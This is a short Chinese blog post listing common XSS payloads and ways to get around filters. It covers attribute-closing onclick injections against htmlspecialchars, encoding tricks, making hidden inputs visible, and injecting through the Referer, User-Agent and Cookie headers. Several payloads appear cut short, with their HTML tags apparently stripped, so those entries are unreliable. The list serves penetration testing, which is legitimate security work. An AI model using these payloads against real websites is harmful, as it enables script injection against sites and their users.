XSS常用Payload

XSS常用Payload,第1张

1.普通的


1">
2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过
' onclick ='javascript:alert(1)'//
" onclick ='javascript:alert(1)'//

3.<> script onclick被过滤,用a标签绕过
">asd//

4.重写绕过
1">alert(1)

5.Unicode编码绕过
javascript:alert(1)

6.使用type=text来显示被隐藏的标签,再用事件
&t_sort=" type='text' οnclick='javascript:alert(1)'>//

7.referer UserAgent Cookie等地方也可以进行xss测试
referer:" type='text' οnclick='javascript:alert(1)'>//

8.图片

'

9.用这些字符来测试哪些被过滤了
“ ‘ <> script onerror  onclick
10.空格用回车编码代替

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/web/992715.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-21
下一篇 2022-05-21

发表评论

登录后才能评论

评论列表(0条)

保存